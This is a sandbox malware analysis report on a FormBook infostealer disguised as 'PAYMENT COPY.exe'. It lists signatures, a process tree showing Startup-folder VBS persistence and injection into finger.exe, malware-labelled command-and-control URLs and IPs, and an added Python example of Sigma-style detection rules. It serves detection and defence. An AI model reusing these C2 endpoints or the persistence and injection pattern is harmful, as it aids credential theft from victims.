
Windows Analysis Report
PAYMENT COPY.exe

Overview

General Information

Sample name: PAYMENT COPY.exe
Analysis ID: 1635000
MD5: 351c6c8652cfb4bf7636bcd23e28b903
SHA1: a585ece22efe9a6b5e77ca4cb5fc7c3c61bd3e48
SHA256: f1dc888c0eb3365e86f4ea915cd13a3357588d98b204ac6036fb7944f723bd8e
Tags: exe, Formbook, user-lowmal3
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PAYMENT COPY.exe (PID: 7040 cmdline: "C:\Users\user\Desktop\PAYMENT COPY.exe" MD5: 351C6C8652CFB4BF7636BCD23E28B903)
    • PAYMENT COPY.exe (PID: 6200 cmdline: "C:\Users\user\Desktop\PAYMENT COPY.exe" MD5: 351C6C8652CFB4BF7636BCD23E28B903)
      • BMYdhGJqo1.exe (PID: 3296 cmdline: "C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\43MttfTFQnpMN.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • finger.exe (PID: 6632 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • BMYdhGJqo1.exe (PID: 4960 cmdline: "C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\JSEAPaWaZQb6hd.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 6768 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wscript.exe (PID: 6772 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • HashSize.exe (PID: 6792 cmdline: "C:\Users\user\AppData\Roaming\HashSize.exe" MD5: 351C6C8652CFB4BF7636BCD23E28B903)
      • HashSize.exe (PID: 7104 cmdline: "C:\Users\user\AppData\Roaming\HashSize.exe" MD5: 351C6C8652CFB4BF7636BCD23E28B903)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.1054007496.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | -
00000004.00000002.3348154175.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
00000004.00000002.3352771061.0000000003190000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
00000004.00000002.3351872954.0000000003140000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
00000006.00000002.1325090938.000000000381D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | -
(table truncated in this extract; 12 entries)

Source | Rule | Description | Author | Strings
6.2.HashSize.exe.38ec6f0.4.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | -
1.2.PAYMENT COPY.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
6.2.HashSize.exe.3a449c0.5.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | -
6.2.HashSize.exe.39451d1.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | -
0.2.PAYMENT COPY.exe.5bd0000.4.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | -
(table truncated in this extract; 4 entries)

                      System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4040, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , ProcessId: 6772, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4040, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , ProcessId: 6772, ProcessName: wscript.exe

                      Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\PAYMENT COPY.exe, ProcessId: 7040, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs
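
The two Sigma matches above hinge on one file-creation event (PAYMENT COPY.exe writing HashSize.vbs into the per-user Startup folder) followed by WScript.exe executing that script, and the process tree in the Classification section adds a second host-side signal: finger.exe from SysWOW64 is launched by an executable under a randomly named Program Files (x86) directory and then spawns both a further copy of that executable and firefox.exe. The Python below is an added example written for this page, not Joe Security's or the Sigma project's code; it evaluates four rules over Sysmon-style process-creation (Event ID 1) and file-creation (Event ID 11) records. The event records are constructed from values visible in this report, with two benign control events appended; the field names follow Sysmon's, and the rule names, the `NO_CHILD_LOLBINS` set and the script-extension list are the example's own choices.

```python
import re
import shlex
from pathlib import PureWindowsPath

# Per-user and all-users Startup folders share this tail; matched case-insensitively.
STARTUP_RE = re.compile(r"\\microsoft\\windows\\start menu\\programs\\startup\\", re.I)
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".bat", ".cmd", ".ps1"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# finger.exe is a console network client: nothing outside C:\Windows\ normally starts it,
# and it never needs to start anything itself. (Assumption of this example.)
NO_CHILD_LOLBINS = {"finger.exe"}


def basename(path):
    return PureWindowsPath(path).name.lower()


def args_of(cmdline):
    # posix=False keeps Windows backslashes literal; quotes are stripped per token afterwards.
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def rule_startup_script_dropped(ev):
    """Sigma-style: a script or executable written into a Startup folder (Event ID 11)."""
    if ev["EventID"] != 11:
        return None
    target = ev["TargetFilename"]
    if STARTUP_RE.search(target) and PureWindowsPath(target).suffix.lower() in SCRIPT_EXTS | {".exe"}:
        return f"{ev['Image']} wrote {target}"
    return None


def rule_script_host_from_startup(ev):
    """Sigma-style: WScript/CScript executing a script that lives in a Startup folder."""
    if ev["EventID"] != 1 or basename(ev["Image"]) not in SCRIPT_HOSTS:
        return None
    for arg in args_of(ev["CommandLine"])[1:]:
        if STARTUP_RE.search(arg) and PureWindowsPath(arg).suffix.lower() in SCRIPT_EXTS:
            return f"{basename(ev['Image'])} executed {arg}"
    return None


def rule_finger_nonwindows_parent(ev):
    """finger.exe started by a parent that does not live under C:\\Windows\\."""
    if (ev["EventID"] == 1 and basename(ev["Image"]) in NO_CHILD_LOLBINS
            and not ev["ParentImage"].lower().startswith("c:\\windows\\")):
        return f"{ev['Image']} launched by {ev['ParentImage']}"
    return None


def rule_finger_spawned_child(ev):
    """finger.exe acting as a parent process at all (here: a dropped exe and firefox.exe)."""
    if ev["EventID"] == 1 and basename(ev["ParentImage"]) in NO_CHILD_LOLBINS:
        return f"{ev['ParentImage']} spawned {ev['Image']}"
    return None


RULES = {
    "startup_script_dropped": rule_startup_script_dropped,
    "script_host_from_startup": rule_script_host_from_startup,
    "finger_nonwindows_parent": rule_finger_nonwindows_parent,
    "finger_spawned_child": rule_finger_spawned_child,
}


def run_rules(events):
    """Apply every rule to every event; return (rule, ProcessId, detail) hits in event order."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            detail = rule(ev)
            if detail:
                hits.append((name, ev["ProcessId"], detail))
    return hits


STARTUP = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
# Constructed from this report's process tree and Sigma matches; the last two are benign controls.
EVENTS = [
    {"EventID": 11, "ProcessId": 7040, "Image": r"C:\Users\user\Desktop\PAYMENT COPY.exe",
     "TargetFilename": STARTUP + r"\HashSize.vbs"},
    {"EventID": 1, "ProcessId": 6772, "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": "",
     "CommandLine": f'"C:\\Windows\\System32\\WScript.exe" "{STARTUP}\\HashSize.vbs"'},
    {"EventID": 1, "ProcessId": 6632, "Image": r"C:\Windows\SysWOW64\finger.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\finger.exe"',
     "ParentImage": r"C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\43MttfTFQnpMN.exe"},
    {"EventID": 1, "ProcessId": 6768, "Image": r"C:\Program Files\Mozilla Firefox\Firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"',
     "ParentImage": r"C:\Windows\SysWOW64\finger.exe"},
    {"EventID": 1, "ProcessId": 4100, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Scripts\logon.vbs"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 11, "ProcessId": 5200, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\user\Desktop\notes.txt"},
]

if __name__ == "__main__":
    for rule, pid, detail in run_rules(EVENTS):
        print(f"[{rule}] pid={pid}: {detail}")
```

The Startup-folder rules are deliberately narrow (script or executable extensions only) so that shortcuts placed there by installers do not fire; the finger.exe rules are the broader signal, because FormBook picks an arbitrary system binary to host its injected code and the same parent/child shape would appear with any other SysWOW64 utility it chose.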
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T09:10:34.306504+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 58075 | 104.21.54.112 | 80 | TCP
2025-03-11T09:10:58.790504+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 58081 | 103.42.144.24 | 80 | TCP
2025-03-11T09:11:11.973577+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 58085 | 13.248.169.48 | 80 | TCP
2025-03-11T09:11:25.155613+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 58089 | 13.248.169.48 | 80 | TCP
2025-03-11T09:11:46.401727+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 58093 | 13.248.169.48 | 80 | TCP
2025-03-11T09:11:59.730006+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 58097 | 209.74.77.230 | 80 | TCP
2025-03-11T09:12:14.058438+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 58101 | 134.122.135.54 | 80 | TCP
2025-03-11T09:12:27.459225+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 58105 | 13.248.169.48 | 80 | TCP
2025-03-11T09:12:48.694614+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 58109 | 13.248.169.48 | 80 | TCP
2025-03-11T09:13:04.172997+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 58113 | 111.119.219.195 | 80 | TCP
2025-03-11T09:13:17.471979+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 58117 | 172.67.148.163 | 80 | TCP
2025-03-11T09:13:33.167575+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 52481 | 157.112.187.77 | 80 | TCP
2025-03-11T09:13:47.247495+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 52485 | 8.222.228.107 | 80 | TCP
2025-03-11T09:14:01.292516+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 52489 | 3.33.130.190 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T09:10:51.117706+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58078 | 103.42.144.24 | 80 | TCP
2025-03-11T09:10:53.659345+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58079 | 103.42.144.24 | 80 | TCP
2025-03-11T09:10:56.339422+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58080 | 103.42.144.24 | 80 | TCP
2025-03-11T09:11:04.285638+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58082 | 13.248.169.48 | 80 | TCP
2025-03-11T09:11:07.908819+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58083 | 13.248.169.48 | 80 | TCP
2025-03-11T09:11:09.406319+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58084 | 13.248.169.48 | 80 | TCP
2025-03-11T09:11:18.549512+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58086 | 13.248.169.48 | 80 | TCP
2025-03-11T09:11:20.043268+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58087 | 13.248.169.48 | 80 | TCP
2025-03-11T09:11:22.583265+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58088 | 13.248.169.48 | 80 | TCP
2025-03-11T09:11:38.750241+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58090 | 13.248.169.48 | 80 | TCP
2025-03-11T09:11:42.362224+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58091 | 13.248.169.48 | 80 | TCP
2025-03-11T09:11:43.852321+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58092 | 13.248.169.48 | 80 | TCP
2025-03-11T09:11:52.046841+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58094 | 209.74.77.230 | 80 | TCP
2025-03-11T09:11:54.611122+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58095 | 209.74.77.230 | 80 | TCP
2025-03-11T09:11:57.165643+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58096 | 209.74.77.230 | 80 | TCP
2025-03-11T09:12:06.310634+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58098 | 134.122.135.54 | 80 | TCP
2025-03-11T09:12:08.856182+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58099 | 134.122.135.54 | 80 | TCP
2025-03-11T09:12:11.480449+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58100 | 134.122.135.54 | 80 | TCP
2025-03-11T09:12:19.565524+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58102 | 13.248.169.48 | 80 | TCP
2025-03-11T09:12:22.143945+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58103 | 13.248.169.48 | 80 | TCP
2025-03-11T09:12:25.940215+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58104 | 13.248.169.48 | 80 | TCP
2025-03-11T09:12:41.022183+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58106 | 13.248.169.48 | 80 | TCP
2025-03-11T09:12:43.575959+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58107 | 13.248.169.48 | 80 | TCP
2025-03-11T09:12:46.132978+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58108 | 13.248.169.48 | 80 | TCP
2025-03-11T09:12:55.924965+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58110 | 111.119.219.195 | 80 | TCP
2025-03-11T09:12:58.471962+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58111 | 111.119.219.195 | 80 | TCP
2025-03-11T09:13:01.018850+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58112 | 111.119.219.195 | 80 | TCP
2025-03-11T09:13:09.822243+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58114 | 172.67.148.163 | 80 | TCP
2025-03-11T09:13:12.364604+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58115 | 172.67.148.163 | 80 | TCP
2025-03-11T09:13:14.930544+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 58116 | 172.67.148.163 | 80 | TCP
2025-03-11T09:13:25.515765+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 52478 | 157.112.187.77 | 80 | TCP
2025-03-11T09:13:28.091044+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 52479 | 157.112.187.77 | 80 | TCP
2025-03-11T09:13:30.616982+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 52480 | 157.112.187.77 | 80 | TCP
2025-03-11T09:13:39.577450+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 52482 | 8.222.228.107 | 80 | TCP
2025-03-11T09:13:42.100738+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 52483 | 8.222.228.107 | 80 | TCP
2025-03-11T09:13:44.648677+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 52484 | 8.222.228.107 | 80 | TCP
2025-03-11T09:13:52.751595+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 52486 | 3.33.130.190 | 80 | TCP
2025-03-11T09:13:55.334189+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 52487 | 3.33.130.190 | 80 | TCP
2025-03-11T09:13:57.868770+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 52488 | 3.33.130.190 | 80 | TCP


                      AV Detection

Source: PAYMENT COPY.exe | Avira: detected
Source: http://www.warc.tech/hxn2/?SxYDlTI=ZV/imptMlgE5kVt692kkoOOnpYQNqGQCFmm/TGgbqnHG1mgu4lPPJ2KHb3Eys5m88oXnT1AcDhAihVQlrO8FE1FC2KR6ZjObRyGnHzUzw9P3InsxcQ==&r2Q4K=X6iHrToHPpvPuDL | Avira URL Cloud: Label: malware
Source: http://www.warc.tech/hxn2/ | Avira URL Cloud: Label: malware
Source: http://www.blogkart4u.xyz/36cg/?SxYDlTI=c6lcAlso4cwdWdj8OmW47AtI274xiSR94bq7w+xrmdROEAiOB56qTuKvZNoCgSLBfC/6u7yUdjQUAHkJ36WqywahPdu8dbqHF6CFfcf9pvxXrPYJYw==&r2Q4K=X6iHrToHPpvPuDL | Avira URL Cloud: Label: malware
Source: http://www.quo1ybjmkhdqljoz.top/ynw5/ | Avira URL Cloud: Label: malware
Source: http://www.blogkart4u.xyz/36cg/ | Avira URL Cloud: Label: malware
Source: http://www.2y0uoqwoohvdf5vd.top/qkhv/ | Avira URL Cloud: Label: malware
Source: http://www.2y0uoqwoohvdf5vd.top/qkhv/?SxYDlTI=i51Ixu4M5LOvjs5atst6QhQmAxFvlGpFEg8Yva/DYuN1L4sxQPD0gcYXROip4eIGKLRWO2x5MCzKIlk6eYaznVU8x6VfWmgC4v2krpA400j5pgNyuA==&r2Q4K=X6iHrToHPpvPuDL | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\HashSize.exe | Avira: detection malicious, Label: HEUR/AGEN.1363658
Source: C:\Users\user\AppData\Roaming\HashSize.exe | ReversingLabs: Detection: 39%
Source: PAYMENT COPY.exe | Virustotal: Detection: 50%
Source: PAYMENT COPY.exe | ReversingLabs: Detection: 39%
Source: Yara match | File source: 1.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3348154175.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3352771061.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3351872954.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1159249310.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3351350564.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1158626557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3351843666.0000000002610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1162118891.0000000001CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PAYMENT COPY.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: PAYMENT COPY.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: finger.pdb source: PAYMENT COPY.exe, 00000001.00000002.1159114036.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000002.3350106221.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PAYMENT COPY.exe, 00000000.00000002.1054440794.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003A44000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000001.00000002.1159408870.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.1164033502.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.000000000370E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.0000000003570000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.1159233310.000000000320D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PAYMENT COPY.exe, 00000000.00000002.1054440794.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003A44000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: PAYMENT COPY.exe, PAYMENT COPY.exe, 00000001.00000002.1159408870.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000004.00000003.1164033502.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.000000000370E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.0000000003570000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.1159233310.000000000320D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BMYdhGJqo1.exe, 00000003.00000000.1079377256.000000000070F000.00000002.00000001.01000000.00000007.sdmp, BMYdhGJqo1.exe, 00000008.00000000.1229141542.000000000070F000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: finger.pdbGCTL source: PAYMENT COPY.exe, 00000001.00000002.1159114036.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000002.3350106221.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\finger.exe | Code function: 4_2_02BBCB70 FindFirstFileW,FindNextFileW,FindClose, 4_2_02BBCB70
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\finger.exe | Code function: 4x nop then xor eax, eax 4_2_02BA9E40
Source: C:\Windows\SysWOW64\finger.exe | Code function: 4x nop then pop edi 4_2_02BAE6E6

                      Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58087 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58113 -> 111.119.219.195:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58115 -> 172.67.148.163:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58098 -> 134.122.135.54:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58084 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58111 -> 111.119.219.195:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58116 -> 172.67.148.163:80
